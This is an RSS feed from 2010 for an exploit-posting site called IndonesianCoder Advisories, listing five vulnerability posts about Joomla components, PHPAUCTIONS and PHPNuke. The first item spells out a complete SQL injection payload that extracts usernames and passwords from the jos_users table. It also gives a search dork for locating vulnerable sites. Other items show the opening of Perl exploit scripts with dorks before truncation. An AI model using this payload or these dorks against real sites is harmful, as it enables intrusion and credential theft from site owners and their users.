<?xml version="1.0" encoding="UTF-8"?><!-- generator="WordPress/2.9.1" -->
<rss version="0.92">
<channel>
	<title>./IndonesianCoder Advisories</title>
	<link>http://www.indonesiancoder.org</link>
	<description></description>
	<lastBuildDate>Wed, 10 Mar 2010 10:22:24 +0000</lastBuildDate>
	<docs>http://backend.userland.com/rss092</docs>
	<language>en</language>
	
	<item>
		<title>Joomla Component hezacontent SQL injection Vulnerability</title>
		<description><![CDATA[
[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 9 march, 2010

[!]===========================================================================[!]


[ Software Information ]
[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:&#8221;CIHUY&#8221; ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0 

[!]===========================================================================[!]

[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_hezacontent&#038;view=item&#038;id=[INDONESIANCODER]
[ XpL ]
-1+union+all+select+1,2,3,4,5,6,concat_ws(0&#215;3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users&#8211;

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM &#124; KILL-9 CREW &#124; [...]]]></description>
		<link>http://www.indonesiancoder.org/joomla-component-hezacontent-sql-injection-vulnerability</link>
			</item>
	<item>
		<title>PHPAUCTIONS XSS Vulnerabilities</title>
		<description><![CDATA[
#############################################################################################################
## Tittle   : PHPAUCTIONS XSS Vulnerabilities                                                [...]]]></description>
		<link>http://www.indonesiancoder.org/phpauctions-xss-vulnerabilities</link>
			</item>
	<item>
		<title>Joomla Component hdflvplayer SQL Injection exploit</title>
		<description><![CDATA[
######################################################################
#
# [~] Joomla Component hdflvplayer SQL Injection exploit - (id)
# [~] Author	: kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage	: http://www.indonesiancoder.com
# [~] Date	: 15 February, 2010
#
######################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
######################################################################
#
# USAGE : perl kaMz.pl
#
######################################################################



#!/usr/bin/perl -w
&#160;
print &#34;\t\t[!]=========================================================[!]\n\n&#34;;
print &#34;\t\t [...]]]></description>
		<link>http://www.indonesiancoder.org/joomla-component-hdflvplayer-sql-injection-exploit</link>
			</item>
	<item>
		<title>Joomla! Joaktree Component Exploit</title>
		<description><![CDATA[
####################################################################################
#[~] Joomla Component com_joaktree  SQL injection Exploit - (treeId)
#[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage	: http://www.indonesiancoder.com
#[~] Date	: 20 February, 2010
####################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
####################################################################################
#
# USAGE : perl kaMz.pl
#
####################################################################################



#!/usr/bin/perl -w
&#160;
print &#34;\t\t[!]=========================================================[!]\n\n&#34;;
print &#34;\t\t   [...]]]></description>
		<link>http://www.indonesiancoder.org/joomla-joaktree-component-exploit</link>
			</item>
	<item>
		<title>PHPNUKE CMS ( Survey&amp;poll ) SQL Injection</title>
		<description><![CDATA[
########################################################################################
## Tittle : PHPNUKE CMS ( Survey&#038;poll ) SQLi Vulner                                              [...]]]></description>
		<link>http://www.indonesiancoder.org/phpnuke-cms-surveypoll-sql-injection</link>
			</item>
</channel>
</rss>
